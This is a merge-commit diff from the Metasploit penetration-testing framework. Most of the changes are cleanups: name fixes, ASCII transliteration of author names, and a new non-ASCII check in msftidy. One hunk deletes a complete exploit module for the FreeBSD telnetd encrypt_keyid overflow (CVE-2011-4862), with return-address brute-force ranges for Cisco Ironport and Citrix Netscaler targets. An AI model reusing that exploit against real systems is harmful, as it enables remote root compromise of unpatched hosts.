Merge branch 'release/20120110000001' into stable

can't ship for a few problems, will be fixed up soonish but
about to release a build.

modules/auxiliary/analyze/jtr_aix.rb

@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
 
 	def initialize
 		super(
-			'Name'            => 'John the Ripper Linux Password Cracker',
+			'Name'            => 'John the Ripper AIX Password Cracker',
 			'Version'         => '$Revision$',
 			'Description'     => %Q{
 					This module uses John the Ripper to identify weak passwords that have been

modules/auxiliary/scanner/http/drupal_views_user_enum.rb

@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
 			'Author'         =>
 				[
 					'Justin Klein Keane', #Original Discovery
-					'Robin François <rof[at]navixia.com>'
+					'Robin Francois <rof[at]navixia.com>'
 				],
 			'License'        => MSF_LICENSE,
 			'References'     =>

modules/auxiliary/scanner/smtp/smtp_version.rb

@@ -37,7 +37,6 @@ class Metasploit3 < Msf::Auxiliary
 		banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
 		print_status("#{ip}:#{rport} SMTP #{banner_sanitized}")
 		report_service(:host => rhost, :port => rport, :name => "smtp", :info => banner)
-		print_error("#{rhost}:#{rport} #{e} #{e.backtrace}")
 	end
 
 end

modules/exploits/freebsd/telnet/telnet_encrypt_keyid_bruteforce.rb

@@ -1,134 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-
-require 'msf/core'
-
-
-class Metasploit3 < Msf::Exploit::Remote
-
-	include Msf::Exploit::Remote::Tcp
-	include Msf::Exploit::Brute
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'FreeBSD based telnetd encrypt_key_id brute force',
-			'Description'    => %q{
-					This module exploits a buffer overflow in the encryption option handler of the
-				FreeBSD telnet service.
-			},
-			'Author'         => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ],
-			'References'     =>
-				[
-					['BID', '51182'],
-					['OSVDB', '78020'],
-					['CVE', '2011-4862'],
-					['URL', 'http://www.exploit-db.com/exploits/18280/']
-				],
-			'Privileged'     => true,
-			'Payload'        =>
-				{
-					'Space'    => 128,
-					'BadChars' => "\x00",
-				},
-			'Platform'       => [ 'bsd' ],
-			'Targets'        =>
-			[
-				#
-				# specific targets
-				#
-				[ 'Cisco Ironport 7.x Bruteforce',
-						{
-							'Bruteforce'   =>
-								{
-
-									'Start' => { 'Ret' => 0x0805cffd },
-									'Stop'  => { 'Ret' => 0x0805aa00 },
-									'Step'  => 8
-								}
-						}
-				],
-
-				[ 'Citrix Netscaler 9.x',
-					{
-							'Bruteforce'   =>
-								{
-
-									'Start' => { 'Ret' => 0x0805bffd },
-									'Stop'  => { 'Ret' => 0x08059000 },
-									'Step'  => 8
-								}
-					}
-				],
-
-				[ 'Other FreeBSD based targets',
-					{
-							'Bruteforce'   =>
-								{
-
-									'Start' => { 'Ret' => 0x0805fffd },
-									'Stop'  => { 'Ret' => 0x08050000 },
-									'Step'  => 8
-								}
-					}
-				],
-
-
-			],
-			'DefaultTarget'  => 0,
-			'DisclosureDate' => 'Dec 23 2011'))
-
-		register_options(
-			[
-				Opt::RPORT(23),
-			], self.class )
-	end
-
-	def brute_exploit(addrs)
-		curr_ret = addrs['Ret']
-		begin
-			connect
-
-			sock.get_once
-			print_status('Initiate encryption mode ...')
-
-			req =  ''
-			req << "\xff\xfa\x26\x00\x01\x01\x12\x13"
-			req << "\x14\x15\x16\x17\x18\x19\xff\xf0"
-			req << "\x00"
-
-			sock.put(req)
-			sock.get_once
-			req = ''
-			print_status("Trying return address 0x%.8x..." % curr_ret )
-			print_status('Sending first payload ...')
-
-			req << "\xff\xfa\x26\x07"
-			req << "\x00"
-			req << make_nops(71)
-			penc = payload.encoded.gsub("\xff", "\xff\xff")
-			req << [curr_ret].pack('V')
-			req << [curr_ret].pack('V')
-
-			req << make_nops(128)
-			req << penc
-			req << "\x90\x90\x90\x90"
-			req << "\xff\xf0"
-			req << "\x00"
-
-			sock.put(req)
-			sock.get_once
-			print_status('Sending second payload ...')
-			sock.put(req)
-
-			disconnect
-			handler
-		rescue
-		end
-	end
-
-end

modules/exploits/multi/http/op5_license.rb

@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Name'        => 'OP5 license.php Remote Command Execution',
 			'Description' => %q{
 				This module exploits an arbitrary root command execution vulnerability in the
-				OP5 Monitor license.php. Ekelöw has confirmed that OP5 Monitor versions 5.3.5,
+				OP5 Monitor license.php. Ekelow has confirmed that OP5 Monitor versions 5.3.5,
 				5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.
 			},
 			'Author'     => [ 'Peter Osterberg <j[at]vel.nu>' ],
@@ -105,4 +105,4 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 	end
-end
+end

modules/exploits/unix/webapp/trixbox_langchoice.rb

@@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# If it has the target footer, we know its vulnerable
 		# however skining may mean the reverse is not true
 		# We've only tested on v2.6.1, so that is all we will guarantee
-		# Example footer: v2.6.1 ©2008 Fonality
+		# Example footer: v2.6.1 &copy;2008 Fonality
 #		if response.body =~ /(v2\.(?:[0-5]\.\d|6\.[0-1]))\s{2}&copy;200[0-8] Fonality/
 		if response.body =~ /(v2\.6\.1)\s{2}&copy;2008 Fonality/
 			print_status "Trixbox #{$1} detected!"

modules/exploits/windows/scada/procyon_core_server.rb

@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Version'        => '$Revision$',
 			'Author'         =>
 				[
-					'Knud Højgaard <keh[at]nsense.dk>',        # Initial discovery
+					'Knud Hojgaard <keh[at]nsense.dk>',        # Initial discovery
 					'mr_me <steventhomasseeley[at]gmail.com>', # Initial discovery & poc/msf
 				],
 			'References'     =>

tools/msftidy.rb

@@ -3,7 +3,7 @@
 # Check (recursively) for style compliance violations and other
 # tree inconsistencies.
 #
-# by jduck
+# by jduck and friends
 #
 
 ##
@@ -82,6 +82,7 @@ def check_single_file(dparts, fparts, f_rel)
 	spaces = 0
 	bi = []
 	ll = []
+	bc = []
 	cr = 0
 	url_ok = true
 	nbo = 0 # non-bin open
@@ -113,6 +114,9 @@ def check_single_file(dparts, fparts, f_rel)
 		src_ended = true if ln =~ /^__END__$/
 		next if src_ended
 
+		if ln =~ /[\x00-\x08\x0b\x0c\x0e-\x19\x7f-\xff]/
+			bc << [ idx, ln.inspect]
+		end
 
 		if (ln.length > LONG_LINE_LENGTH)
 			ll << [ idx, ln ]
@@ -156,6 +160,14 @@ def check_single_file(dparts, fparts, f_rel)
 		}
 	end
 
+	if bc.length > 0
+		puts "%s ... probably has unicode: %u" % [f, bc.length]
+		bc.each { |ec|
+			ec[1] = ec[1].inspect
+			puts '  %8d: %s' % ec
+		}
+	end
+
 	show_count(f, 'carriage return EOL', cr)
 	show_missing(f, 'incorrect URL to framework site', url_ok)
 	show_missing(f, 'writes to stdout', no_stdio)